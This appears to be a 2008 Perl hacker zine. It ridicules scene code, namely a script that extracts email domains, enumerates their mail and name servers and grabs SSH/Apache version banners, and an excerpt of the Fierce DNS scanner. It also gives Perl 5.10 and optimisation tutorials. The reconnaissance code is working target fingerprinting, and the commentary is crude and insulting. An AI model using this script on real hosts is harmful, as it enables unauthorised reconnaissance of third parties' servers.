[ASCII-art zine logo, garbled in this copy]
[root@yourbox.anywhere]$ date
Sat Mar 1 18:22:16 EST 2008
Initiating...
Dumping...
Schooling...
Besides that, we bring to you all the exciting Perl material that you can
handle. We have impressive collections of bad code to create lessons from,
and educational pieces by (mostly) established Perl experts.
#!/usr/bin/perl
# usage: own-kyx.pl narc1.txt
#
# this TEAM #PHRACK script will extract the email addresses
# out of the narc*.txt files, enumerate the primary MX and NS
# for each domain, and grab the SSHD and APACHE server version
# from each of these hosts (if possible).
#
# For educational purposes only. Do not use.
# lawl this is old shit (but not past the statute of limitations)
# lets rag on old "TEAM #PHRACK"
close INF;
# plus you can do this while you read the file, not read it all
# first
foreach $victim (@targets) {
    print "=====\t$victim \t=====\n";
    my ($lusr, $domn) = split(/@/, $victim);
    $smtphost = `host -tMX $domn |cut -d\" \" -f7 | head -1`;
    # whats with random trailers? //e not even used here, you have
    # an empty replacement! dumbfucks
    $smtphost =~ s/[\r\n]+$//ge;
    print ":: Primary MX located at $smtphost\n";
    sshcheq($smtphost);
    apachecheq($smtphost);
    $nshost = `host -tNS $domn |cut -d\" \" -f4 | head -1`;
    # //e again? wtf?
    $nshost =~ s/[\r\n]+$//ge;
    sleep(3);
    print ":: Primary NS located at $nshost\n";
    sshcheq($nshost);
    apachecheq($nshost);
    print "\n\n";
    # parens everywhere
    sleep(3);
}
sub sshcheq {
    # I think someone is confused about where his paren is supposed to go!
    (my $sshost) = @_;
    print ":: Testing $sshost for sshd version\n";
    # not a single good variable name in this script
    $g = inet_aton($sshost); my $prot = 22;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!\n";
    if(connect(S,pack "SnA4x8",2,$prot,$g)) {
        # omg this line isn't too bad
        my @in;
        select(S); $|=1; print "\n";
        while(<S>){ push @in, $_;}
        # @in = <S>; # lawl
        # Parse while reading the file
        select(STDOUT); close(S);
        # man this is old school..
        foreach $res (@in) {
            if ($res =~ /SSH/) {
                # MOST COMPLEX YOUR PROGRAM IS
                chomp $res; print ":: SSHD version - $res\n";
            }
        }
    } else { return 0; } # coulda done this first and saved some
                         # in-den-tation
}
# same shit different subroutine, maybe you could have made them into one
# with a pair of parameters HMM?
sub apachecheq {
    (my $whost) = @_;
    print ":: Testing $whost for Apache version\n";
    $g = inet_aton($whost); my $prot = 80;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!\n";
    if(connect(S,pack "SnA4x8",2,$prot,$g)) {
        my @in;
        select(S); $|=1; print "HEAD / HTTP/1.0\r\n\r\n";
        while(<S>){ push @in, $_;}
        select(STDOUT); close(S);
        foreach $res (@in) {
            if ($res =~ /ache/) {
                chomp $res; print ":: HTTPD version - $res\n";
            }
        }
    } else { return 0; }
}
Damian said that this list, in expanded form, is going to be part of the
standard Perl distribution soon.
- When types of data form a natural hierarchy that lets us use inheritance.
  Inheritance is one of the most powerful features of OO, and the ability
  to use it is a sign that objects fit the problem.
- When you have a piece of data on which many different operations are
  applied. Graphics images, for instance, might be blurred, cropped,
  rotated, and adjusted.
- When the kinds of operations have standard names (check, process, etc).
  Objects allow you to have a DB::check, ISBN::check, Shape::check, etc.
  without having conflicts between the types of check.
First, allow us to explain Perl versions, so you understand just what this
means. Note, especially, that Perl 5.10 is not Perl 5.1: in Perl's version
numbering, 5.10 comes after 5.9. It's not Perl 6, either; it's the latest
continuation of the Perl 5 language. Perl 6 is still coming.
Major releases:
Now, at this point it might seem weird that Perl jumped four versions in
seven years, yet in the fourteen years since then it has not moved on.
Partially, it has: Perl 6 has been (roughly) specified and implemented.
But it isn't quite *here*, for various reasons.
Thirdly, Perl is more stable and mature now, and the rate of growth has
slowed. That's one long story! Part of the story is that even-numbered
versions (5.8, 5.10) represent stable releases, while odd-numbered ones
(5.9) represent the working development series. See perlhist for much
more detail.
Perl 5.10 is a big deal. We have been using Perl 5.8 for six years now.
Like any other Perl release, 5.10 has brought some things that will change
how we code Perl. It also brought some things that won't do that, and some
things that we might think better of in a few years.
Here are a few of the good ones that you're likely to see.
say(). say() is like Ruby puts(), or Python print(), or Perl 6 say(), etc.
All it is is a print with a newline. It'll definitely be less of a pain in
the ass than print and a \n, and looks cleaner.
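A minimal before-and-after (needs perl 5.10+, or anywhere the feature
pragma knows 'say'):

```perl
use feature 'say';

my $who = "world";
print "Hello, $who\n";   # old style: explicit newline
say "Hello, $who";       # 5.10 style: newline for free
```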
Lexical $_. Instead of being worried about clobbering $_, we can create
a lexical version and all is good, leading to shorter syntax.
State variables. This is something we should have had a long time ago.
They are similar in concept to C static variables. Better than using a
closure (which has also improved in Perl 5.10), usually.
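A sketch of the C-static flavour:

```perl
use feature 'state';

sub counter {
    state $n = 0;   # initialised once, value kept between calls
    return ++$n;
}

counter() for 1 .. 2;
print counter(), "\n";   # prints 3
```

Before 5.10 you'd have wrapped the sub in a bare block with a shared
lexical to get the same effect.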
The notorious given statement: Perl finally has a switch statement. Kind
of. Take a look, the syntax is kind of a hassle and will make you wonder
why you aren't just using if blocks. Until you read how it uses smart
matching. The naming is smartly in-tune with the linguistic character of
Perl.
Possibly the single most pressing change in Perl 5.10 is smart matching.
Smart matching is just that, you give two operands and Perl compares them
in a natural way. Gives us a whole new area to be confused in, and to
create data-dependent runtime bugs.
~~~~~
The behaviour of a smart match depends on what type of thing its arguments
are. It is always commutative, i.e. $a ~~ $b behaves the same as $b ~~ $a.
The behaviour is determined by the following table: the first row that
applies, in either order, determines the match behaviour.
    $a    $b      Type of Match Implied    Matching Code
    Hash  Hash    hash keys identical      [sort keys %$a] ~~ [sort keys %$b]
    Hash  Array   hash slice existence     grep { exists $a->{$_} } @$b
    Hash  Regex   hash key grep            grep /$b/, keys %$a
    Hash  Any     hash entry existence     exists $a->{$b}
+ - this must be a code reference whose prototype (if present) is not ""
(subs with a "" prototype are dealt with by the 'Code()' entry lower
down)
* - that is, each element matches the element of same index in the other
array. If a circular reference is found, we fall back to referential
equality.
! - either a real number, or a string that looks like a number
The "matching code" doesn't represent the real matching code, of course:
it's just there to explain the intended meaning. Unlike grep, the smart
match operator will short-circuit whenever it can.
~~~~
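The "matching code" column is ordinary Perl, so you can try the semantics
directly. For instance, the Hash-Array row (hash slice existence) boils
down to this:

```perl
my %config = (host => 'example.com', port => 8080);
my @wanted = ('host', 'user');

# Hash ~~ Array: true if any element of the array is a key of the hash
my $any_key = grep { exists $config{$_} } @wanted;
print $any_key ? "match\n" : "no match\n";   # prints "match"
```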
Smart matching is one of those fancy Perl 6 features that some people
did not want backported to Perl 5. The official PU position is that when
Perl 6 comes to the show, the world will probably use it, sooner or later.
But until then, don't hold anything back, Perl 5 is beautiful and we can
continue to make it better.
More on Perl 5.10 at the end of the zine. If you can't wait, check out
these pieces right now. Or do it later, but either way, read them. There
is a lot more than just what we have summarized here.
http://dev.perl.org/perl5/news/2007/perl-5.10.0.html
http://search.cpan.org/dist/perl-5.10.0/pod/perl5100delta.pod
#!/usr/bin/perl
#########################################
# Fierce v0.9.9 - Beta 03/24/2007
# By RSnake http://ha.ckers.org/fierce/
# Threading and additions by IceShaman
#########################################
my @common_cnames;
my $count_hostnames = 0;
my @domain_ns;
my $h;
my @ip_and_hostname;
my $logging;
my %options = ();
my $res = Net::DNS::Resolver->new;
my $search_found;
my %subnets;
my %tested_names;
my $this_ip;
my $version_num = 'Version 0.9.9 - Beta 03/24/2007';
my $webservers = 0;
my $wildcard_dns;
my @wildcards;
my @zone;
my $count;
my %known_ips;
my %known_names;
my @output;
my @thread;
my $thread_support;
# Wow, nice load of variables there.
my $result = GetOptions (
'dns=s' => \$dns,
'file=s' => \$filename,
'suppress' => \$suppress,
'help' => \$help,
'connect=s' => \$http_connect,
'range=s' => \$range,
'wide' => \$wide,
'delay=i' => \$delay,
'dnsfile=s' => \$dns_file,
'dnsserver=s' => \$dns_server,
'version' => \$version,
'search=s' => \$search,
'wordlist=s' => \$wordlist,
'fulloutput' => \$full_output,
'nopattern' => \$nopattern,
'tcptimeout=i' => \$tcp_timeout,
'traverse=i' => \$traverse,
'threads=i' => \$threads,
);
if ($http_connect) {
    unless (-e $http_connect) {
        open (HEADERS, "$http_connect") # Why'd you quote the scalar here,
                                        # but not above? And don't you know
                                        # about the security risks of using
                                        # open() like this
            or quit_early("Having trouble opening $http_connect");
        close HEADERS; # uh... open... and close... Are you just testing
                       # that you can? -r for that
    }
}
if ($dns_file) {
    open (DNSFILE, '<', $dns_file)
        or quit_early("Can't open $dns_file");
    for (<DNSFILE>) {
        chomp;
        push @dns_servers, $_; # yucky sucky
    }
    if (@dns_servers) {
        output("Using DNS servers from $dns_file");
    } else {
        output("DNS file $dns_file is empty, using default options");
    }
}
# OK these guys are just too lame to profile much more of their code
# We're gonna cut almost all of it out and just point out a few especially
# funny parts
# lawl someone meant > 255! Someone did not test his shitty code!
quit_early('The -t flag must contain an integer 0-255') if $traverse < 255;
# This line here makes those or's look kinda dumb, huh?
$wordlist = $wordlist || 'hosts.txt';
if (-e $wordlist) {
    # user provided or default
    open (WORDLIST, '<', $wordlist) or
        open (WORDLIST, '<', 'hosts.txt') or
            quit_early("Can't open $wordlist or the default wordlist");
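For the record, the idiomatic spelling of that default is the
or-assignment operator, and 5.10's //= does it without clobbering a
legitimate false value (variable names borrowed from the script above):

```perl
my $wordlist;
$wordlist ||= 'hosts.txt';   # any false value gets the default

my $delay = 0;
$delay //= 5;                # 5.10 defined-or: 0 survives, only undef
                             # would get the default
print "$wordlist $delay\n";
```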
# It's just all very silly and stupid. To think that these guys wrote this up,
# didn't clean it, didn't even test it, and then released it to the world like
# it was big shit and they were bigger. kids, just keep your shitty code to
# yourself. Or send it to us for PU+ certification.
# RSnake needs to stick to his nice easy PHP world, where he can be a god
# among retards. Same for IceShaman and HTS. Neither can play with grown-ups.
Introduction
So you have a perl script. And it's too slow. And you want to do something
about it. This is a talk about what you can do to speed it up, and also
how you try to avoid the problem in the first place.
Obvious things
Your code runs in the most efficient way that you can think of. But maybe
someone else looked at the problem from a completely different direction
and found an algorithm that is 100 times faster. Are you sure you have the
best algorithm? Do some research.
mod_perl
For a CGI script that I wrote, I found that even after I'd shaved
everything off it that I could, the server could still only serve 2.5 per
second. The same server running the same script under mod_perl could serve
25 per second. That's a factor of 10 speedup for very little effort. And
if your script isn't suitable for running under mod_perl there's also
fastcgi (which CGI.pm supports). And if your script isn't a CGI, you could
look at the persistent perl daemon, package PPerl on CPAN.
XS
You may find that 95% of the time is spent in 5% of the code, doing
something that perl is not that efficient at, such as bit shifting. So you
could write that bit in C, leave the rest in perl, and glue it together
with XS. But you'd have to learn XS and the perl API, and that's a lot of
work.
Inline
Or you could use Inline. If you have to manipulate perl's internals then
you'll still have to learn perl's API, but if all you need is to call out
from perl to your pure C code, or someone else's C library then Inline
makes it easy.
Here's my perl script making a call to a perl function rot32. And here's a
C function rot32 that takes 2 integers, rotates the first by the second,
and returns an integer result. That's all you need! And you run it and it
works.
Are you running your script on the perl supplied by the OS? Compiling your
own perl could make your script go faster. For example, when perl is
compiled with threading, all its internal variables are made thread safe,
which slows them down a bit. If the perl is threaded, but you don't use
threads then you're paying that speed hit for no reason. Likewise, you may
have a better compiler than the OS used. For example, I found that with
gcc 3.2 some of my C code ran 5% faster than with gcc 2.95. [One of my
helpful hecklers in the audience said that he'd seen a 14% speedup, (if I
remember correctly) and if I remember correctly that was from recompiling
the perl interpreter itself]
hashes
There's a Larry Wall quote - Doing linear scans over an associative array
is like trying to club someone to death with a loaded Uzi.
I trust you're not doing that. But are you keeping your arrays nicely
sorted so that you can do a binary search? That's fast. But using a hash
should be faster.
pack and unpack
pack and unpack have far too many features to remember. Look at the
manpage - you may be able to replace entire subroutines with just one
unpack.
undef
For example the script in the Encode module that compiles character
conversion tables would print out a warning if it saw the same character
twice. If you or I build perl we'll just let those build warnings scroll
off the screen - we don't care - we can't do anything about it. And it
turned out that keeping track of everything needed to generate those
warnings was slowing things down considerably. So I added a flag to
disable that code, and perl 5.8 defaults to use it, so it builds more
quickly.
Intermission
Various helpful hecklers (most of London.pm who saw the talk (and I'm
counting David Adler as part of London.pm as he's subscribed to the list))
wanted me to remind people that you really really don't want to be
optimising unless you absolutely have to. You're making your code harder
to maintain, harder to extend, and easier to introduce new bugs into.
Probably you've done something wrong to get to the point where you need to
optimise in the first place.
I agree.
Also, I'm not going to change the running order of the slides. There isn't
a good order to try to describe things in, and some of the ideas that
follow are actually more "good practice" than optimisation techniques, so
possibly ought to come before the slides on finding slowness. I'll mark
what I think are good habits to get into, and once you understand the
techniques then I'd hope that you'd use them automatically when you first
write code. That way (hopefully) your code will never be so slow that you
actually want to do some of the brute force optimising I describe here.
Tests
The most important thing when you are optimising existing working code is
not to introduce new bugs.
For this, you can use your full suite of regression tests. You do have
one, don't you?
[At this point the audience is supposed to laugh nervously, because I'm
betting that very few people are in this desirable situation of having
comprehensive tests written]
You must keep a copy of your original program. It is your last resort if
all else fails. Check it into a version control system. Make an off site
backup. Check that your backup is readable. You mustn't lose it.
In the end, your ultimate test of whether you've not introduced new bugs
while optimising is to check that you get identical output from the
optimised version and the original. (With the optimised version taking
less time).
CPU
It's obvious that if your script hogs the CPU for 10 seconds solid, then
to make it go faster you'll need to reduce the CPU demand.
RAM
You can never have enough memory, and it's never fast enough.
Computer memory is like a pyramid. At the apex you have the CPU and its
registers, which are very small and very fast to access. Then you have 1
or more levels of cache, which is larger, close by and fast to access.
Then you have main memory, which is quite large, but further away so
slower to access. Then at the base you have disk acting as virtual memory,
which is huge, but very slow.
Now, if your program is swapping out to disk, you'll realise, because the
OS can tell you that it only took 10 seconds of CPU, but 60 seconds
elapsed, so you know it spent 50 seconds waiting for disk and that's your
speed problem. But if your data is big enough to fit in main RAM, but
doesn't all sit in the cache, then the CPU will keep having to wait for
data from main RAM. And the OS timers I described count that in the CPU
time, so it may not be obvious that memory use is actually your problem.
This is the original code for the part of the Encode compiler (enc2xs)
that generates the warnings on duplicate characters:
if (exists $seen{$uch}) {
    warn sprintf("U%04X is %02X%02X and %02X%02X\n",
                 $val,$page,$ch,@{$seen{$uch}});
}
else {
    $seen{$uch} = [$page,$ch];
}
It uses the hash %seen to remember all the Unicode characters that it has
processed. The first time that it meets a character it won't be in the
hash, the exists is false, so the else block executes. It stores an
arrayref containing the code page and character number in that page.
That's three things per character, and there are a lot of characters in
Chinese.
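The optimised version isn't shown in this excerpt. The shape of the fix,
reconstructed from the description (this is a sketch, not the actual
enc2xs code), is to stop allocating a three-part arrayref per character
and store one packed scalar instead:

```perl
my ($page, $ch) = (0x81, 0x40);
my %seen;

# one scalar per character instead of an arrayref holding two values
$seen{"\x{4E00}"} = pack "CC", $page, $ch;

# unpack only on the rare duplicate-warning path
my ($opage, $och) = unpack "CC", $seen{"\x{4E00}"};
```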
That reduced the memory usage by a third, and it runs more quickly.
Step by step
How do you make things faster? Well, this is something of a black art,
down to trial and error. I'll expand on aspects of these 4 points in the
next slides.
What might be slow?
You need to find things that are actually slow. It's no good wasting your
effort on things that are already fast - put it in where it will get
maximum reward.
Think of re-write
But not all slow things can be made faster, however much you swear at
them, so you can only actually speed things up if you can figure out
another way of doing the same thing that may be faster.
Try it
But it may not. Check that it's faster and that it gives the same results.
Note results
Either way, note your results - I find a comment in the code is good. It's
important if an idea didn't work, because it stops you or anyone else
going back and trying the same thing again. And it's important if a change
does work, as it stops someone else (such as yourself next month) tidying
up an important optimisation and losing you that hard won speed gain.
By having commented out slower code near the faster code you can look back
and get ideas for other places you might optimise in the same way.
These are things that I would consider good practice, so you ought to be
doing them as a matter of routine.
If you're writing modules use the AutoSplit and AutoLoader modules to make
perl only load the parts of your module that are actually being used by a
particular script. You get two gains - you don't waste CPU at start up
loading the parts of your module that aren't used, and you don't waste the
RAM holding the structures that perl generates when it has compiled
code. So your modules load more quickly, and use less RAM.
Schwern notes that commenting out __END__ can cause surprises if the main
body of your module is running under use strict; because now your
AutoLoaded subroutines will suddenly find themselves being run under use
strict. This is arguably a bug in the current AutoSplit - when it runs at
install time to generate the files for AutoLoader to use it doesn't add
lines such as use strict; or use warnings; to ensure that the split out
subroutines are in the same environment as was current at the __END__
statement. This may be fixed in 5.10.
Elizabeth Mattijsen notes that there are different memory use versus
memory shared issues when running under mod_perl, with different optimal
solutions depending on whether your apache is forking or threaded.
=pod @ __END__
If you are documenting your code with one big block of pod, then you
probably don't want to put it at the top of the file. The perl parser is
very fast at skipping pod, but it's not magic, so it still takes a little
time. Moreover, it has to read the pod from disk in order to ignore it.
#!perl -w
use strict;
=head1 You don't want to do that
big block of pod
=cut
...
1;
__END__
=head1 You want to do this
If you put your pod after an __END__ statement then the perl parser will
never even see it. This will save a small amount of CPU, but if you have a
lot of pod (>4K) then it might also mean that the last disk block(s) of a
file are never even read in to RAM. This may gain you some speed. [A
helpful heckler observed that modern raid systems may well be reading in
64K chunks, and modern OSes are getting good at read ahead, so not reading
a block as a result of =pod @ __END__ may actually be quite rare.]
If you are putting your pod (and tests) next to their functions' code
(which is probably a better approach anyway) then this advice is not
relevant to you.
Most modules are able to export lots of their functions and other symbols
into your namespace to save you typing. If you have only one argument to
use, such as
use POSIX; # Exports all the defaults
then POSIX will helpfully export its default list of symbols into your
namespace. If you have a list after the module name, then that is taken as
a list of symbols to export. If the list is empty, no symbols are
exported:
use POSIX (); # Exports nothing.
You can still use all the functions and other symbols - you just have to
use their full name, by typing POSIX:: at the front. Some people argue
that this actually makes your code clearer, as it is now obvious where
each subroutine is defined. Independent of that, it's faster:

    use POSIX;          use POSIX ();
    0.516s              0.355s

    use Socket;         use Socket ();
    0.270s              0.231s
regexps
avoid $&
The $& variable returns the last text successfully matched in any regular
expression. It's not lexically scoped, so unlike the match variables $1
etc it isn't reset when you leave a block. This means that to be correct
perl has to keep track of it from any match, as perl has no idea when it
might be needed. As it involves taking a copy of the matched string, it's
expensive for perl to keep track of. If you never mention $&, then perl
knows it can cheat and never store it. But if you (or any module you
load) mention $& anywhere, then perl has to keep track of it throughout
the script, which
slows things down. So it's a good idea to capture the whole match
explicitly if that's what you need.
$text =~ /.* rules/;
$line = $&; # Now every match will copy $& - slow
$text =~ /(.* rules)/;
$line = $1; # Didn't mention $& - fast
use English gives helpful long names to all the punctuation variables.
Unfortunately that includes aliasing $& to $MATCH, which makes perl think
that it needs to copy every match into $&, even if your script never
actually uses it. In perl 5.8 you can say use English '-no_match_vars';
to avoid mentioning the naughty "word", but this isn't available in
earlier versions of perl.
Are you using parentheses for capturing, or just for grouping? Capturing
involves perl copying the matched string into $1 etc, so if all you need
is grouping, use the non-capturing (?:...) instead of the capturing
(...).
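Side by side:

```perl
my $text = "perl rules";

$text =~ /(?:perl|ruby) rules/;   # grouping only: nothing copied
my $grouped = defined $1 ? "captured" : "no capture";

$text =~ /(perl|ruby) rules/;     # capturing: matched text copied to $1
my $captured = $1;
```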
/.../o;
If you define scalars with building blocks for your regexps, and then make
your final regexp by interpolating them, then your final regexp isn't
going to change. However, perl doesn't realise this, because it sees that
there are interpolated scalars each time it meets your regexp, and has no
idea that their contents are the same as before. If your regexp doesn't
change, then use the /o flag to tell perl, and it will never waste time
checking or recompiling it.
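A sketch: the pattern below interpolates $word, but since $word never
changes, /o lets perl compile the regexp once and reuse it:

```perl
my $word = '[a-z]+';   # regexp building block, set once

my @hits;
for my $candidate (qw(foo BAR baz)) {
    # /o: promise that $word won't change, so compile only once
    push @hits, $candidate if $candidate =~ /^$word$/o;
}
```

If $word *could* change, /o silently gives you stale matches, so only
use it when the interpolated parts really are constant.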
but don't blow it
You can use the qr// operator to pre-compile your regexps. It often is the
easiest way to write regexp components to build up more complex regexps.
Using it to build your regexps once is a good idea. But don't screw up
(like parrot's assemble.pl did) by telling perl to recompile the same
regexp every time you enter a subroutine:
sub foo {
    my $reg1 = qr/.../;
    my $reg2 = qr/... $reg1 .../;
You should pull those two regexp definitions out of the subroutine into
package variables, or file scoped lexicals.
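That is, something like this (the patterns are placeholders):

```perl
# file-scoped lexicals: each qr// is compiled exactly once
my $reg1 = qr/\d+/;
my $reg2 = qr/v$reg1\.$reg1/;

sub foo {
    my ($s) = @_;
    return $s =~ $reg2;   # reuses the already-compiled regexp
}
```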
Devel::DProf
You find what is slow by using a profiler. People often guess where they
think their program is slow, and get it hopelessly wrong. Use a profiler.
Perl's profiler is Devel::DProf: you run your script with
perl -d:DProf yourscript.pl, which times things and stores the data in a
file named tmon.out. Then you run dprofpp to process the tmon.out file
and produce meaningful summary information. This excerpt is the default
length and format, but you can
use options to change things - see the man page. It also seems to show up
a minor bug in dprofpp, because it manages to total things up to get 106%.
At the top of the list, the subroutine enter takes about half the total
CPU time, with 200,000 calls, each very fast. That makes it a good
candidate to optimise, because all you have to do is make a slight change
that gives a small speedup, and that gain will be magnified 200,000 times.
[It turned out that enter was tail recursive, and part of the speed gain I
got was by making it loop instead]
Third on the list is encode_U, which with 45,000 calls is similar, and
worth looking at. [Actually, it was trivial code and in the real enc2xs I
inlined it]
Don't bother below there, as you've accounted for 90% of total program
time, so even if you did a perfect job on everything else, you could only
make the program run 10% faster.
Benchmark
Now you've identified the slow spots, you need to try alternative code to
see if you can find something faster. The Benchmark module makes this
easy. A particularly good subroutine is cmpthese, which takes code
snippets and plots a chart. cmpthese was added to Benchmark with perl 5.6.
So to compare two code snippets orig and new by running each for 10000
times you'd do this:
use Benchmark ':all';

sub orig {
    ...
}

sub new {
    ...
}

cmpthese(10000, { orig => \&orig, new => \&new });
Benchmark runs both, times them, and then prints out a helpful comparison
chart:
Benchmark: timing 10000 iterations of new, orig...
new: 1 wallclock secs ( 0.70 usr + 0.00 sys = 0.70 CPU) @
14222.22/s (n=10000)
orig: 4 wallclock secs ( 3.94 usr + 0.00 sys = 3.94 CPU) @
2539.68/s (n=10000)
Rate orig new
orig 2540/s -- -82%
new 14222/s 460% --
and it's plain to see that my new code is over 4 times as fast as my
original code.
Actually, I didn't tell the whole truth earlier about what causes slowness
in perl. [And astute hecklers such as Philip Newton had already told me
this]
Computers are fast at simple things like addition. But there is quite a
lot of overhead involved in keeping track of "which op am I currently
performing" and "where is the next op", and this book-keeping often swamps
the time taken to actually run the ops. So often in perl it's the number
of ops your program takes to perform its task that is more important than
the CPU time they use or the RAM they need. The hit list is
Ops
CPU
RAM
[per-iteration timing figures from the slide omitted]
but the first one is much slower. Why? Following the data path from right
to left, it starts well with a global regexp, which is only one op and
therefore a fast way to generate a list of the 4 digit groups. But that
map block is actually an implicit loop, so for each 4 digit block it
iterates round and repeatedly calls hex. That's at least one op for every
list item.
Whereas the second one has no loops in it, implicit or explicit. It uses
one pack to convert the hex temporarily into a binary string, and then one
unpack to convert that string into a list of numbers. n is big endian 16
bit quantities. I didn't know that - I had to look it up. But when the
profiler told me that this part of the original code was a performance
bottleneck, the first thing that I did was to look at the pack docs to
see if I could use some sort of pack/unpack as a speedier replacement.
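The two versions under discussion aren't shown in this excerpt;
reconstructed from the description above, they look something like this:

```perl
my $hex = "00480065006c";   # three 16-bit values written as hex text

# original: the map block is an implicit loop - one hex() call per group
my @slow = map { hex $_ } $hex =~ /(....)/g;

# replacement: no loop at all - one pack, one unpack
# ("n" means big-endian 16-bit quantities)
my @fast = unpack "n*", pack "H*", $hex;
```

Both produce (72, 101, 108); the second does it in a constant number of
ops regardless of string length.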
Ops are bad, m'kay
You can ask perl to tell you the ops that it generates for particular code
with the Terse backend to the compiler. For example, here's a 1 liner to
show the ops in the original code:
At the bottom you can see how the match /(....)/ is just one op. But the
next diagonal line of ops from mapwhile down to the match are all the ops
that make up the map. Lots of them. And they get run each time round map's
loop. [Note also that the {}s mean that map enters scope each time round
the loop. That's not a trivially cheap op either]
There are fewer ops in total. And no loops, so all the ops you see execute
only once. :-)
[My helpful hecklers pointed out that it's hard to work out what an op is.
Good call. There's roughly one op per symbol (function, operator, variable
name, and any other bit of perl syntax). So if you golf down the number of
functions and operators your program runs, then you'll be reducing the
number of ops.]
Memoize
MJD's Memoize follows the grand perl tradition by trading memory for
speed. You tell Memoize the name(s) of functions you'd like to speed up,
and it does symbol table games to transparently intercept calls to them.
It looks at the parameters the function was called with, and uses them to
decide what to do next. If it hasn't seen a particular set of parameters
before, it calls the original function with the parameters. However,
before returning the result, it stores it in a hash for that function,
keyed by the function's parameters. If it has seen the parameters before,
then it just returns the result direct from the hash, without even
bothering to call the function.
This is useful for functions that calculate things with no side effects,
slow functions that you often call repeatedly with the same parameters.
It's not useful for functions that do things external to the program (such
as generating output), nor is it good for very small, fast functions.
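The classic demonstration is a naive Fibonacci, which is pure and calls
itself with the same arguments over and over:

```perl
use Memoize;

# pure function, repeatedly called with the same arguments
sub fib {
    my $n = shift;
    return $n < 2 ? $n : fib($n - 1) + fib($n - 2);
}
memoize('fib');   # each distinct $n is now computed only once

print fib(30), "\n";   # prints 832040, near-instantly
```

Without the memoize call, fib(30) makes over a million recursive calls.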
The hash Memoize uses is a regular perl hash. This means that you can tie
the hash to a disk file. This allows Memoize to remember things across
runs of your program. That way, you could use Memoize in a CGI to cache
static content that you only generate on demand (but remember you'll need
file locking). The first person who requests something has to wait for the
generation routine, but everyone else gets it straight from the cache. You
can also arrange for another program to periodically expire results from
the cache.
As of 5.8 the Memoize module has been assimilated into the core. Users of
earlier perls can get it from CPAN.
Miscellaneous
These are quite general ideas for optimisation that aren't particularly
perl specific.
perl's hash lookups are fast. But they aren't as fast as a lexical
variable. enc2xs was calling a function each time round a loop based on a
hash lookup using $type as the key. The value of $type didn't change, so I
pulled the lookup out above the loop into a lexical variable:
my $type_func = $encode_types{$type};
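In context the change looks something like this (the names and the loop
are hypothetical, not the real enc2xs code):

```perl
my %encode_types = ( text => sub { return uc $_[0] } );
my $type = 'text';

# before: $encode_types{$type} was looked up on every iteration;
# after: hoist the unchanging hash lookup out of the loop
my $type_func = $encode_types{$type};

my @out;
push @out, $type_func->($_) for qw(a b);
```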
Something else I found was that enc2xs was calling a function which took
several arguments from a small number of places. The function contained
code to set defaults if some of the arguments were not supplied. I found
that the way the program ran, most of the calls passed in all the values
and didn't need the defaults. Changing the function to not set defaults,
and writing those defaults out explicitly where needed bought me a speed
up.
Tail recursion
Tail recursion is where the last thing a function does is call itself
again with slightly different arguments. It's a common idiom, and some
languages can automatically optimise it away. Perl is not one of those
languages. So every time a function tail recurses you have another
subroutine call [not cheap - Arthur Bergman notes that it is 10 pages of C
source, and will blow the instruction cache on a CPU] and re-entering that
subroutine again causes more memory to be allocated to store a new set of
lexical variables [also not cheap].
perl can't spot that it could just throw away the old lexicals and re-use
their space, but you can, so you can save CPU and RAM by re-writing your
tail recursive subroutines with loops. In general, trying to reduce
recursion by replacing it with iterative algorithms should speed things
up.
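A toy sketch of the rewrite (summing a countdown; not code from any real program):

```perl
# Tail recursive: each step is a fresh sub call with a fresh pad
# of lexicals allocated for it.
sub sum_to_rec {
    my ($n, $total) = @_;
    return $total if $n == 0;
    return sum_to_rec($n - 1, $total + $n);
}

# Iterative: the same arithmetic, no call overhead, constant memory.
sub sum_to_loop {
    my ($n, $total) = @_;
    while ($n > 0) {
        $total += $n;
        $n--;
    }
    return $total;
}
```

Both return the same answer; the loop just gets there without re-entering the subroutine at every step.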
yay for y
tr doesn't delete characters unless you use the /d flag. If you don't even
have any replacement characters then it treats its target as read only. In
scalar context it returns the number of characters that matched. It's the
fastest way to count the number of occurrences of single characters and
character ranges. (ie it's faster than counting the elements returned by
m/.../g in list context. But if you just want to see whether one or more
of a character is present, use m/.../, because it will stop at the first
match, whereas tr/// has to go to the end)
tr is faster than the regexp engines for doing character range deletions.
[When writing the slide I assumed that it would be faster for single
character deletions, but I Benchmarked things and found that s///g was
faster for them. So never guess timings; always test things. You'll be
surprised, but that's better than being wrong]
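Counting with tr in scalar context looks like this (the DNA string is just example data):

```perl
my $dna = "GATTACAGATTACA";

# In scalar context tr/// counts matches without modifying anything.
my $a_count  = ($dna =~ tr/A//);    # 6  - a single character
my $at_count = ($dna =~ tr/AT//);   # 10 - a character set

# Existence test: m// can stop at the first hit, tr/// cannot.
my $has_g = $dna =~ /G/;
```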
Ops are bad, m'kay
The original makes a temporary list with split [not bad in itself - ops
are more important than CPU or RAM] and then loops over it. Each time
round the loop it executes several ops, including using ord to convert the
byte to its numeric value, and then using sprintf with the format
"\\x%02X" to convert that number to the C source.
The new code effectively merges the split and looped ord into one op,
using unpack's C format to generate the list of numeric values directly.
The more interesting (arguably sick) part is the format to sprintf, which
is inside +(...). You can see from the .= in the original that the code is
just concatenating the converted form of each byte together. So instead of
making sprintf convert each value in turn, only for perl ops to stick them
together, I use x to replicate the per-byte format string once for each
byte I'm about to convert. There's now one "\\x%02X" for each of the
numbers in the list passed from unpack to sprintf, so sprintf just does
what it's told. And sprintf is faster than perl ops.
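The trick, boiled down to a few lines (the variable names here are mine, not from enc2xs):

```perl
my $bytes = "abc";

# One op gets all the numeric values...
my @values = unpack "C*", $bytes;

# ...and one sprintf does all the formatting: the per-byte format
# is replicated once per byte with x, so the concatenation of the
# converted bytes happens inside C code, not in perl ops.
my $c_source = sprintf '\x%02X' x @values, @values;

print "$c_source\n";   # \x61\x62\x63
```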
You have enormous power at your disposal with regexps, pack, unpack and
sprintf. So why not use them?
All the pack and unpack code is implemented in pure C, so doesn't have any
of the book-keeping overhead of perl ops. sprintf too is pure C, so it's
fast. The regexp engine uses its own private bytecode, but it's specially
tuned for regexps, so it runs much faster than general perl code. And the
implementation of tr has less to do than the regexp engine, so it's
faster.
For maximum power, remember that you can generate regexps and the formats
for pack, unpack and sprintf at run time, based on your data.
Make it obvious to the interpreter what you're up to. Avoid $&, use
(?:...) when you don't need capturing, and put the /o flag on constant
regexps.
less OPs
Try to accomplish your tasks using fewer operations. If you find you have
to optimise an existing program then this is where to start - golf is
good, but remember it's run time strokes not source code strokes.
less CPU
less RAM
